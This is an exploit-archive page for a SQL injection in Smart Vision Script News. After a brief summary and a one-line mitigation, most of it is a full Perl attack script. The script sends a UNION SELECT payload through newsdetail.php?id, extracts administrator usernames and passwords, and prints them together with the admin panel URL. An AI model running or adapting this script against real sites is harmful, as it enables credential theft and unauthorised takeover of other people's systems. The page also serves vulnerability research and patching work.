header-logo
Suggest Exploit
vendor:
Smart Vision Script News
by:
darkmasking
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Smart Vision Script News
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

Smart Vision Script News (newsdetail) SQL Injection Exploit

The Smart Vision Script News (newsdetail) is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the target system.

Mitigation:

Apply proper input validation and parameterized queries to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

#!usr/bin/perl 
############################################################################
# Exploit Title: Smart Vision Script News (newsdetail) SQL Injection Exploit
# Date: 01-04-2010
# Author: darkmasking
############################################################################
# This was written for educational purpose only. Use it at your own risk. 
# Author will be not responsible for any damage! 
############################################################################ 
# Vuln discovered by Err0R 
# Smart Vision Script News ( newsdetail ) SQL Injection Vulnerability
# http://www.exploit-db.com/exploits/10977
############################################################################
# Greetz : sorry bro lom ada teman jadi tuk diri sendiri aja 0_o
############################################################################
 
  use IO::Socket::INET; 
  use LWP::UserAgent; 
 
  sub banner { 
 
  print "\n". 
              "[»]=============================================[_][-][X]\n". 
	      "[»]  =======   ------d-------m------   ====    ====   [»]\n". 
	      "[»]  || === =       | |(o o)| |        ||== || ==||   [»]\n". 
	      "[»]  || === =         ||(~)||          || =    = ||   [»]\n". 
	      "[»]  =======             |             ||        ||   [»]\n". 
	      "[»]---------------------------------------------------[»]\n". 
              "[»] Smart Vision Script News (newsdetail)             [»]\n". 
              "[»] SQL Injection Exploit                             [»]\n". 
              "[»] by darkmasking                                    [»]\n". 
              "[»] Vuln discovered by Err0R                          [»]\n". 
              "[»]===================================================[»]\n\n"; 
 } 
 
 my $host    = $ARGV[0]; 
 my $sql_path = "/newsdetail.php?id="; 
 my $admin_path ="/admin/admin.php"; 
 
 if (@ARGV < 1) { 
    &banner(); 
    &help("-1"); 
 } 
 
 elsif(check($host) == 1) { 
	&banner(); 
	&dmploit($host,$sql_path); 
 } 
 
 else { 
    &banner(); 
    help("-2"); 
 } 
 
 sub dmploit() { 
 
    my $host     = $_[0]; 
    my $sql_path = $_[1]; 
 
    print "[+] Getting Username and Password\n"; 
    print "[!] Checking...\n"; 
    print "\n"; 
 
	my $sql_atk = $host.$sql_path."-9999 union select null,concat(0x6461726b6d61736b696e67,0x3a,user_name,0x3a,password,0x3a,0x6461726b6d61736b696e67),null,null,null,null,null from zagrosle_zagros.user_accounts--";
	my $sql_get = get_url($sql_atk); 
    my $connect = tag($sql_get); 
 
    if($connect =~ /darkmasking:(.+):(.+):darkmasking/) { 
 
    print "-o0 SQL Injection Successfully 0o-\n"; 
    print "[+] Username : $1\n"; 
    print "[+] Password : $2\n"; 
    print "\n"; 
    print "[+] Admin URL = $host$admin_path\n"; 
 
    } 
 
    else { 
	print "[-] SQL Injection Failed\n"; 
    } 
 } 
 
   sub get_url() { 
    $link = $_[0]; 
    my $req = HTTP::Request->new(GET => $link); 
    my $ua = LWP::UserAgent->new(); 
    $ua->timeout(5); 
    my $response = $ua->request($req); 
    return $response->content; 
  } 
 
  sub tag() { 
    my $string = $_[0]; 
    $string =~ s/ /\$/g; 
    $string =~ s/\s/\*/g; 
    return($string); 
  } 
 
  sub check() { 
  my $host  = $_[0]; 
  if ($host =~ /http:\/\/(.*)/) { 
    return 1; 
    } 
    else { 
    return 0; 
    } 
  } 
 
  sub help() { 
 
  my $error = $_[0]; 
  if ($error == -1) { 
  print "\n[-] Error, missed some arguments !\n\n"; 
  } 
 
  elsif ($error == -2) { 
 
    print "\n[-] Error, Bad arguments !\n"; 
    } 
 
    print " Usage : perl $0 http://www.darkurl.com/\n\n"; 
    print " Ex    : perl $0 http://www.darkurl.com/\n\n"; 
    exit(0); 
  }